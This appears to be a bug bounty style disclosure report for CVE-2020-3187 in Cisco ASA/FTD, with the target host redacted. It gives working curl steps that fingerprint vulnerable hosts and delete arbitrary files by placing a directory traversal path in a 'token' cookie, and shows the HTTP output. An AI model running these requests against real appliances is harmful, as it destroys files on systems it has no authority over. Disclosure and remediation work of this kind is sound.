Unauthenticated Arbitrary File Deletion ("CVE-2020-3187") in ████████

**Description:** A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files. Vulnerable host: - `https://██████/` ## Impact An exploit could allow the attacker to view or delete arbitrary files on the system. ## Step-by-step Reproduction Instructions 1) Identifying vulnerable host by send request to `/+CSCOE+/session_password.html`. ```bash > curl -skiL "https://██████/+CSCOE+/session_password.html" ``` ``` GET /+CSCOE+/session_password.html HTTP/1.1 Host: ███████ User-Agent: curl/7.47.0 Accept: */* ``` If the target is vulnerable, the response header will display `webvpn` header, like: ``` HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 0 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Thu, 10 Sep 2020 04:14:27 GMT X-Frame-Options: SAMEORIGIN webvpn: ``` 2) Perform exploits to delete files by adding `token` in cookie header request. For example, I want to delete this (https://████/+CSCOU+/csco_logo.gif) file. ```bash > curl -Ik https://██████████/+CSCOU+/csco_logo.gif < HTTP/1.1 200 OK < Content-Type: image/gif < Content-Length: 2678 < Cache-Control: max-age=6000 < Connection: Keep-Alive < Date: Thu, 10 Sep 2020 04:19:54 GMT < X-Frame-Options: SAMEORIGIN ``` Request: ```bash > curl -skiL "https://███████/+CSCOE+/session_password.html" \ -H "Cookie: token=../+CSCOU+/csco_logo.gif" ``` ``` GET /+CSCOE+/session_password.html HTTP/1.1 Host: ███████ Cookie: token=../+CSCOU+/csco_logo.gif User-Agent: curl/7.47.0 Accept: */* ``` The following response is shown: ``` HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 0 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Thu, 10 Sep 2020 04:21:02 GMT X-Frame-Options: SAMEORIGIN webvpn: ``` File deleted successfully: ```bash > curl -Ik https://██████████/+CSCOU+/csco_logo.gif < HTTP/1.1 404 Not Found < Cache-Control: no-cache < Pragma: no-cache < Connection: Close < Date: Thu, 10 Sep 2020 04:21:20 GMT < X-Frame-Options: SAMEORIGIN ``` ## Suggested Mitigation/Remediation Actions - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 ## Impact An exploit could allow the attacker to view or delete arbitrary files on the system.